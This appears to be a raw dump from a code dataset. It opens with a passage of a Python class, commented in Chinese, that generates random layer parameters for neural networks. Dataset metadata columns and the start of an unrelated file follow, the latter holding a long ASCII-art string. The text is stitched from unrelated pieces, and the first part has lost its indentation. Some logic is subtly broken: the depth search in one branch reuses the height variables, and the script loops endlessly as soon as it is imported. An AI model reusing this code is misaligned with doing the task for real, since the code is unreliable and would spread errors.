ouput_width = output_padding_width + stride_width*(input_width - 1) - 2*padding_width + dilation_size*(kernel_size_width - 1) + 1
# output_padding_height = ouput_height - stride_height*(input_height - 1) + 2*padding_height - dilation_size*(kernel_size_height - 1) - 1
# output_padding_width = ouput_width - stride_width*(input_width - 1) + 2*padding_width - dilation_size*(kernel_size_width - 1) - 1
#计算output_size
output_size = [input_size[0],out_channels,ouput_height,ouput_width]
# print([int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,output_padding_height,output_padding_width,dilation_size,groups]])
return [int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,output_padding_height,output_padding_width,dilation_size,groups]]
# return nn.ConvTranspose2d(in_channels,out_channels,(kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),\
# padding=(padding_height, padding_width),output_padding=(output_padding_height,output_padding_width),dilation=dilation,groups=groups)
elif(layer_id == 5):
# print(output_size,'output_size')
assert output_size==None,"反卷积层只支持不指定输出大小"
input_depth = input_size[2]
input_height = input_size[3]
input_width = input_size[4]
in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,\
stride_height,stride_width,padding_depth,padding_height,padding_width,output_padding_depth,output_padding_height,output_padding_width,\
dilation,groups = [0 for index in range(16)]
in_channels = input_size[1]
if(output_size==None):
if(in_channels <= 3):
out_channels = random.randint(16,64)
else:
out_channels = random.randint(int(in_channels*2),in_channels*3)
output_size = [0,0,0,0]
output_size = [input_size[0],out_channels,input_depth,input_height,input_width]
#生成宽高一样的kernel
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
kernel_size_depth,kernel_size_height,kernel_size_width = kernel_size,kernel_size,kernel_size
#生成宽高一样的dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
common_divisor = self.get_common_divisor(in_channels,out_channels)
output_padding_height = 0
output_padding_width = 0
output_padding_depth = 0
if(len(common_divisor) == 1):
#只有公约数1
groups = 1
else:
groups = self.prob_random(common_divisor,[0.95]+[(1-0.95)/(len(common_divisor)-1) for i in range(len(common_divisor)-1)])
#生成stride,padding
if(True):
stride_size = 1
stride_height,stride_width,stride_depth = stride_size,stride_size,stride_size
padding_size = random.randint(0,kernel_size)
padding_depth,padding_height,padding_width = padding_size,padding_size,padding_size
ouput_depth = output_padding_depth + stride_depth*(input_depth - 1) - 2*padding_depth + dilation_size*(kernel_size_depth - 1) + 1
ouput_height = output_padding_height + stride_height*(input_height - 1) - 2*padding_height + dilation_size*(kernel_size_height - 1) + 1
ouput_width = output_padding_width + stride_width*(input_width - 1) - 2*padding_width + dilation_size*(kernel_size_width - 1) + 1
# output_padding_height = ouput_height - stride_height*(input_height - 1) + 2*padding_height - dilation_size*(kernel_size_height - 1) - 1
# output_padding_width = ouput_width - stride_width*(input_width - 1) + 2*padding_width - dilation_size*(kernel_size_width - 1) - 1
#计算output_size
output_size = [input_size[0],out_channels,ouput_depth,ouput_height,ouput_width]
# print([int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,\
# stride_height,stride_width,padding_depth,padding_height,padding_width,output_padding_depth,output_padding_height,output_padding_width,\
# dilation_size,groups]])
return [int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,\
stride_height,stride_width,padding_depth,padding_height,padding_width,output_padding_depth,output_padding_height,output_padding_width,\
dilation_size,groups]]
# return nn.ConvTranspose3d(in_channels,out_channels,(kernel_size_depth, kernel_size_height, kernel_size_width), stride=(stride_depth, stride_height, stride_width),\
# padding=(padding_depth, padding_height, padding_width),output_padding=(output_padding_depth, output_padding_height, output_padding_width),dilation=dilation,groups=groups)
elif(layer_id == 6):
#如果是max pooling则需要返回indices
input_length = input_size[2]
input_channels = input_size[1]
kernel_size,stride_size,padding_size,dilation_size,pool_type = [0 for index in range(5)]
pool_type = random.randint(0,1)
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
#生成宽高一样的dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
if(pool_type == 1):
dilation_size = 1
if(output_size==None):
# stride_size = self.prob_random([1,2,3],[0.6,0.3,0.1])
stride_size = 1
padding_size = random.randint(0,kernel_size)
#计算output_size
out_length = (input_length + 2*padding_size - dilation_size*(kernel_size-1) - 1)/(stride_size) + 1
output_size = [input_size[0],input_channels,out_length]
else:
#通过已知的kernel_size,dilation_size计算stride_size,padding_size的整数解
out_length = output_size[2]
input_length = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "疑似找不到符合要求的神经网络层"
for p in range(0,int(kernel_size/2)+1):
stride_size = (input_length + 2*p - dilation_size*(kernel_size-1) - 1)/(out_length - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
return [int(i) for i in input_size+output_size+[kernel_size,stride_size,padding_size,dilation_size,pool_type]]
elif(layer_id == 7):
#如果是max pooling则需要返回indices
input_height = input_size[2]
input_width = input_size[3]
input_channels = input_size[1]
kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,dilation_height,dilation_width,pool_type = [0 for index in range(9)]
pool_type = random.randint(0,1)
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
#生成宽高一样的dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
dilation_height,dilation_width = dilation_size,dilation_size
if(pool_type == 1):
dilation_height,dilation_width = 1,1
if(output_size==None):
# stride_size = self.prob_random([1,2,3],[0.6,0.3,0.1])
stride_size = 1
stride_height,stride_width = stride_size,stride_size
padding_size = 0
padding_height,padding_width = padding_size,padding_size
#计算output_size
out_height = math.floor((input_height + 2*padding_height - dilation_height*(kernel_size_height-1) - 1)/(stride_height) + 1)
out_width = math.floor((input_width + 2*padding_width - dilation_width*(kernel_size_width-1) - 1)/(stride_width) + 1)
output_size = [input_size[0],input_channels,out_height,out_width]
else:
#通过已知的kernel_size,dilation_size计算stride_size,padding_size的整数解
out_height = output_size[2]
in_height = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "疑似找不到符合要求的神经网络层"
for p in range(0,int(kernel_size/2)+1):
stride_size = (in_height + 2*p - dilation_size*(kernel_size-1) - 1)/(out_height - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
padding_height,padding_width = padding_size,padding_size
stride_height,stride_width = stride_size,stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
return [int(i) for i in input_size+output_size+[kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,dilation_height,dilation_width,pool_type]]
elif(layer_id == 8):
#如果是max pooling则需要返回indices
input_depth = input_size[2]
input_height = input_size[3]
input_width = input_size[4]
input_channels = input_size[1]
kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,\
stride_width,padding_depth,padding_height,padding_width,dilation_depth,dilation_height,dilation_width,pool_type = [0 for index in range(13)]
pool_type = random.randint(0,1)
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
kernel_size_depth,kernel_size_height,kernel_size_width = kernel_size,kernel_size,kernel_size
#生成宽高一样的dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
dilation_depth,dilation_height,dilation_width = dilation_size,dilation_size,dilation_size
if(pool_type == 1):
dilation_depth,dilation_height,dilation_width = 1,1,1
if(output_size==None):
# stride_size = self.prob_random([1,2,3],[0.6,0.3,0.1])
stride_size = 1
stride_depth,stride_height,stride_width = stride_size,stride_size,stride_size
padding_size = random.randint(0,kernel_size)
padding_depth,padding_height,padding_width = padding_size,padding_size,padding_size
#计算output_size
out_depth = (input_depth + 2*padding_depth - dilation_depth*(kernel_size_depth-1) - 1)/(stride_depth) + 1
out_height = (input_height + 2*padding_height - dilation_height*(kernel_size_height-1) - 1)/(stride_height) + 1
out_width = (input_width + 2*padding_width - dilation_width*(kernel_size_width-1) - 1)/(stride_width) + 1
output_size = [input_size[0],input_channels,out_depth,out_height,out_width]
else:
#通过已知的kernel_size,dilation_size计算stride_size,padding_size的整数解
out_height = output_size[3]
in_height = input_size[3]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "疑似找不到符合要求的神经网络层"
for p in range(0,int(kernel_size/2)+1):
stride_size = (in_height + 2*p - dilation_size*(kernel_size-1) - 1)/(out_height - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
padding_height,padding_width = padding_size,padding_size
stride_height,stride_width = stride_size,stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
out_depth = output_size[2]
in_depth = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "疑似找不到符合要求的神经网络层"
for p in range(0,int(kernel_size/2)+1):
stride_size = (in_depth + 2*p - dilation_size*(kernel_size-1) - 1)/(out_depth - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
padding_depth = padding_size
stride_depth = stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_depth = kernel_size
return [int(i) for i in input_size+output_size+[kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,\
stride_width,padding_depth,padding_height,padding_width,dilation_depth,dilation_height,dilation_width,pool_type]]
elif(layer_id == 9):
input_channels = input_size[1]
input_length = input_size[2]
kernel_size,stride_size,padding_size = [0 for index in range(3)]
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
if(output_size==None):
# stride_size = self.prob_random([1,2,3],[0.6,0.3,0.1])
stride_size = 1
padding_size = random.randint(0,kernel_size)
#计算output_size
out_length = (input_length-1)*stride_size - 2*padding_size + kernel_size
output_size = [input_size[0],input_channels,out_length]
else:
#通过已知的kernel_size,dilation_size计算stride_size,padding_size的整数解
out_length = output_size[2]
input_length = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "疑似找不到符合要求的神经网络层"
for padding in range(0,int(kernel_size/2)+1):
stride_size = (2*padding - kernel_size + out_length) / (input_length-1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = padding
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
return [int(i) for i in input_size+output_size+[kernel_size,stride_size,padding_size]]
# return nn.MaxUnpool2d(kernel_size = (kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),padding=(padding_height, padding_width))
# return nn.MaxUnpool1d(kernel_size = kernel_size, stride=stride, padding=padding)
elif(layer_id == 10):
input_channels = input_size[1]
input_height = input_size[2]
input_width = input_size[3]
kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width = [0 for index in range(6)]
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
if(output_size==None):
# stride_size = self.prob_random([1,2,3],[0.6,0.3,0.1])
stride_size = 1
stride_height,stride_width = stride_size,stride_size
padding_size = random.randint(0,kernel_size)
padding_height,padding_width = padding_size,padding_size
#计算output_size
out_height = (input_height-1)*stride_height - 2*padding_height + kernel_size_height
out_width = (input_width-1)*stride_width - 2*padding_width + kernel_size_width
output_size = [input_size[0],input_channels,out_height,out_width]
else:
#通过已知的kernel_size,dilation_size计算stride_size,padding_size的整数解
out_height = output_size[2]
in_height = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "疑似找不到符合要求的神经网络层"
for padding in range(0,int(kernel_size/2)+1):
stride_size = (2*padding - kernel_size_height + out_height) / (input_height-1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = padding
padding_height,padding_width = padding_size,padding_size
stride_height,stride_width = stride_size,stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
return [int(i) for i in input_size+output_size+[kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width]]
# return nn.MaxUnpool2d(kernel_size = (kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),padding=(padding_height, padding_width))
elif(layer_id == 11):
input_channels = input_size[1]
input_depth = input_size[2]
input_height = input_size[3]
input_width = input_size[4]
kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width = [0 for index in range(9)]
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
kernel_size_depth,kernel_size_height,kernel_size_width = kernel_size,kernel_size,kernel_size
if(output_size==None):
# stride_size = self.prob_random([1,2,3],[0.6,0.3,0.1])
stride_size = 1
stride_depth,stride_height,stride_width = stride_size,stride_size,stride_size
padding_size = random.randint(0,kernel_size)
padding_depth,padding_height,padding_width = padding_size,padding_size,padding_size
#计算output_size
out_depth = (input_depth-1)*stride_depth - 2*padding_depth + kernel_size_depth
out_height = (input_height-1)*stride_height - 2*padding_height + kernel_size_height
out_width = (input_width-1)*stride_width - 2*padding_width + kernel_size_width
output_size = [input_size[0],input_channels,out_depth,out_height,out_width]
else:
#通过已知的kernel_size,dilation_size计算stride_size,padding_size的整数解
out_height = output_size[3]
in_height = input_size[3]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "疑似找不到符合要求的神经网络层"
for padding in range(0,int(kernel_size/2)+1):
stride_size = (2*padding - kernel_size_height + out_height) / (input_height-1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = padding
padding_height,padding_width = padding_size,padding_size
stride_height,stride_width = stride_size,stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
out_depth = output_size[2]
in_depth = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "疑似找不到符合要求的神经网络层"
for padding in range(0,int(kernel_size/2)+1):
stride_size = (2*padding - kernel_size_height + out_height) / (input_height-1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = padding
padding_depth = padding_size
stride_depth = stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_depth = kernel_size
return [int(i) for i in input_size+output_size+[kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width]]
elif(layer_id == 12):
pool_type = random.randint(0,1)
if(output_size==None):
return input_size + input_size + [pool_type]
else:
return input_size + output_size + [pool_type]
elif(layer_id == 13):
pool_type = random.randint(0,1)
if(output_size==None):
return input_size + input_size + [pool_type]
else:
return input_size + output_size + [pool_type]
elif(layer_id == 14):
pool_type = random.randint(0,1)
if(output_size==None):
return input_size + input_size + [pool_type]
else:
return input_size + output_size + [pool_type]
elif(layer_id == 15):
num_features = input_size[1]
return input_size + [num_features]
elif(layer_id == 16):
num_features = input_size[1]
return input_size + [num_features]
elif(layer_id == 17):
num_features = input_size[1]
return input_size + [num_features]
elif(layer_id == 18):
probability = self.prob_random([0.1,0.2,0.3,0.4,0.5],[0.2 for i in range(5)])
return input_size+[probability]
elif(layer_id == 19):
probability = self.prob_random([0.1,0.2,0.3,0.4,0.5],[0.2 for i in range(5)])
return input_size+[probability]
elif(layer_id == 20):
probability = self.prob_random([0.1,0.2,0.3,0.4,0.5],[0.2 for i in range(5)])
return input_size+[probability]
elif(layer_id == 21):
return input_size+output_size
elif(layer_id == 22):
activation_type = random.randint(1,4)
length = input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
if(activation_type == 1):
return [input_size[0],length] + [1,0,0,0]
elif(activation_type == 2):
return [input_size[0],length] + [0,1,0,0]
elif(activation_type == 3):
return [input_size[0],length] + [0,0,1,0]
else:
return [input_size[0],length] + [0,0,0,1]
#由于add和concat不是实际的神经网络层,随便返回一个神经网络层
elif(layer_id == 23):
length = input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
return [input_size[0],length]+[out_channels]
elif(layer_id == 24):
length = input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
return [input_size[0],length]+[add_num]
elif(layer_id == 25):
probability = self.prob_random([0.1,0.2,0.3,0.4,0.5],[0.2 for i in range(5)])
return input_size+[probability]
elif(layer_id == 26):
probability = self.prob_random([0.1,0.2,0.3,0.4,0.5],[0.2 for i in range(5)])
return input_size+[probability]
def get_net_input_size(self):
    '''
    Generate a random overall input size for the network, according to
    self.dimension.

    return: list — [batch, channels, *spatial], batch fixed at 1
    '''
    dim = self.dimension
    if dim == 1:
        # 1-D signal: single channel, random length.
        return [1, 1, random.randint(100, 10000)]
    if dim == 2:
        # 2-D image: fixed ImageNet-style 3 x 224 x 224.
        return [1, 3, 224, 224]
    # 3-D (video): random square frame edge, random frame count,
    # 1-3 channels. RNG draw order matches the original implementation.
    edge = random.randint(28, 112)
    frames = random.randint(15, 80)
    return [1, random.randint(1, 3), frames, edge, edge]
def get_layer_output_size(self,params,input_size):
    '''
    Compute a layer's output size from its input size.

    params: list — the layer's parameter vector
    input_size: list — the layer's input size
    return: list — the layer's output size

    NOTE(review): stub — no implementation yet; currently falls through and
    returns None implicitly.
    '''
def prob_random(self,arr1,arr2):
    '''
    Pick one element of arr1 at random, weighted by the probabilities
    in arr2.

    arr1: list of candidate values
    arr2: list of weights, same length as arr1 (need not sum exactly to 1)
    return: one element of arr1

    Bug fix: the previous implementation scaled each weight to an integer
    with int() truncation; for weights such as 1/7 the truncated buckets
    summed to slightly less than the sampled range, so the draw could fall
    past the last bucket and the function returned None. random.choices
    normalizes the weights itself and always returns an element.
    '''
    assert len(arr1) == len(arr2), "Length does not match."
    return random.choices(arr1, weights=arr2, k=1)[0]
def get_common_divisor(self,a,b):
    '''
    Return all common divisors of a and b, in increasing order (1 included).

    a, b: positive integers
    return: list of common divisors

    Bug fix: the loop previously iterated over range(2, max(a, b)), which
    both excludes the upper bound and scans past min(a, b); e.g. for
    a == b == 4 the divisor 4 itself was missed. A common divisor can be
    at most min(a, b), so iterate up to and including it.
    '''
    common_divisor_list = [1]
    for i in range(2, min(a, b) + 1):
        if a % i == 0 and b % i == 0:
            common_divisor_list.append(i)
    return common_divisor_list
def get_link_vector(self,link_list,target_layer_index):
    '''
    Build the connection vector for one node.

    link_list: indices of predecessor nodes; -1 marks the initial
               network input
    target_layer_index: this node's index within the layer-id array
    return: 0/1 list of length target_layer_index + 1
    '''
    link_vector = [0] * (target_layer_index + 1)
    for src in link_list:
        if src == -1:
            # -1 means this node consumes the network's initial input.
            link_vector[target_layer_index] = 1
        else:
            link_vector[src] = 1
    return link_vector
def get_params_length(self,layer_id):
    '''
    Return the length of the parameter vector for a given layer id.

    layer_id: integer layer type id (0-26)
    return: int vector length
    raises KeyError for an unknown layer id
    '''
    # Fixed lookup table: layer id -> parameter-vector length,
    # grouped by (1-D, 2-D, 3-D) layer triples where applicable.
    lengths = {
        0: 13, 1: 19, 2: 25,     # conv
        3: 14, 4: 20, 5: 26,     # transposed conv
        6: 11, 7: 17, 8: 23,     # pooling
        9: 9, 10: 14, 11: 19,    # unpooling
        12: 7, 13: 9, 14: 11,    # adaptive pooling
        15: 4, 16: 5, 17: 6,     # batch norm
        18: 4, 19: 5, 20: 6,     # dropout
        21: 4,                   # linear
        22: 6,                   # activation
        23: 3, 24: 3,            # concat / add placeholders
        25: 5, 26: 6,            # dropout variants
    }
    return lengths[layer_id]
def get_params_num(self,layer_id,params_list):
    '''
    Estimate the number of trainable parameters of one layer.

    layer_id: integer layer type id
    params_list: the layer's flat parameter vector
                 (input size + output size + layer-specific fields)
    return: int parameter count (0 for layers without trainable weights)

    Bug fixes:
    - The 1-D and 2-D formulas were swapped: layer ids come in
      (1-D, 2-D, 3-D) triples and get_params_length gives lengths 13/19
      for ids 0/1 and 14/20 for ids 3/4, yet id 0 read 2-D-layout indices
      ([1],[5],[10],[11]) and id 1 read 1-D-layout indices ([1],[4],[8])
      (and likewise for ids 3 vs 4). Indices are now matched to each id's
      actual vector layout.
    - Layer 21 read `params[1,3]`: `params` is an undefined name and
      `[1,3]` is an invalid list index; it now reads params_list[1] and
      params_list[3].
    '''
    if layer_id in (0, 3):
        # 1-D conv / transposed conv, vector: input(3)+output(3)+fields.
        # [1]=in_channels, [4]=out_channels, [8]=kernel length.
        input_channels, output_channels, kernel_length = params_list[1], params_list[4], params_list[8]
        return input_channels * output_channels * kernel_length
    elif layer_id in (1, 4):
        # 2-D conv / transposed conv, vector: input(4)+output(4)+fields.
        # [1]=in_channels, [5]=out_channels, [10]=k_h, [11]=k_w.
        input_channels, output_channels = params_list[1], params_list[5]
        kernel_height, kernel_width = params_list[10], params_list[11]
        return input_channels * kernel_height * kernel_width * output_channels
    elif layer_id in (2, 5):
        # 3-D conv / transposed conv, vector: input(5)+output(5)+fields.
        # [1]=in_channels, [6]=out_channels, [12..14]=k_d, k_h, k_w.
        input_channels, output_channels = params_list[1], params_list[6]
        kernel_size_depth, kernel_size_height, kernel_size_width = params_list[12], params_list[13], params_list[14]
        return input_channels * output_channels * kernel_size_depth * kernel_size_height * kernel_size_width
    elif layer_id == 21:
        # Fully connected layer: weights + bias per output unit.
        input_length, output_length = params_list[1], params_list[3]
        return input_length * (output_length + 1)
    else:
        # Pooling, unpooling, adaptive pooling, dropout, activation,
        # add/concat placeholders, and batch norm (whose affine parameters
        # are deliberately not counted here): parameter-free.
        return 0
def prob_random(arr1,arr2):
    '''
    Pick one element of arr1 at random, weighted by the probabilities
    in arr2. Module-level duplicate of the method of the same name.

    arr1: list of candidate values
    arr2: list of weights, same length as arr1 (need not sum exactly to 1)
    return: one element of arr1

    Bug fix: the previous implementation scaled each weight to an integer
    with int() truncation; for weights such as 1/7 the truncated buckets
    summed to slightly less than the sampled range, so the draw could fall
    past the last bucket and the function returned None. random.choices
    normalizes the weights itself and always returns an element.
    '''
    assert len(arr1) == len(arr2), "Length does not match."
    return random.choices(arr1, weights=arr2, k=1)[0]
def make_net_data():
    '''
    Endlessly generate random networks and count how many pass validation.

    NOTE(review): relies on VectorGenerator and validate_NN defined
    elsewhere in this file; runs forever (no stop condition), printing a
    running count of valid networks.
    '''
    count = 0
    while True:
        stream_num = 1
        block_num = random.randint(8, 24)
        large = random.randint(0, 1)
        try:
            dim = 2
            print(stream_num, block_num, large)
            generator = VectorGenerator(dimension=dim, block_num=block_num, stream_num=stream_num, large=large)
            generator.make_net()
            if not validate_NN(generator, dim):
                # Re-draw and retry. (These assignments are immediately
                # overwritten at the top of the loop; kept so the RNG
                # stream matches the original implementation.)
                stream_num = 1
                block_num = random.randint(8, 24)
                continue
            count += 1
            print('计数', count)
        except Exception as e:
            print(e)
            continue
# Script entry point: starts the infinite generation loop unconditionally
# (no `if __name__ == "__main__":` guard, so it also runs on import).
make_net_data()
| 42.460115
| 285
| 0.621696
| 22,548
| 162,877
| 4.180282
| 0.026654
| 0.083071
| 0.052198
| 0.03779
| 0.894936
| 0.870896
| 0.846133
| 0.824098
| 0.811717
| 0.797373
| 0
| 0.044361
| 0.269664
| 162,877
| 3,836
| 286
| 42.460115
| 0.747947
| 0.149217
| 0
| 0.800774
| 0
| 0
| 0.002892
| 0
| 0
| 0
| 0
| 0
| 0.006576
| 1
| 0.014313
| false
| 0
| 0.008897
| 0
| 0.075048
| 0.004255
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6952c73101fec8321007cd8a6e745002864a6e99
| 72,643
|
py
|
Python
|
DaOS.py
|
DantaNotEpic/daOS
|
5146f2f1634e2086aaefa86117c27ddc47ee3d5f
|
[
"Apache-2.0"
] | 1
|
2021-04-05T16:04:01.000Z
|
2021-04-05T16:04:01.000Z
|
DaOS.py
|
DantaNotEpic/daOS
|
5146f2f1634e2086aaefa86117c27ddc47ee3d5f
|
[
"Apache-2.0"
] | 1
|
2021-04-05T16:09:39.000Z
|
2021-04-05T16:11:30.000Z
|
DaOS.py
|
gianxddddd/daOS
|
98a8ef6b72b9f80d9104f8e7056b5f338d070867
|
[
"Apache-2.0"
] | 2
|
2021-04-05T16:00:59.000Z
|
2021-04-05T16:04:05.000Z
|
import time
daDesktop = """\MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
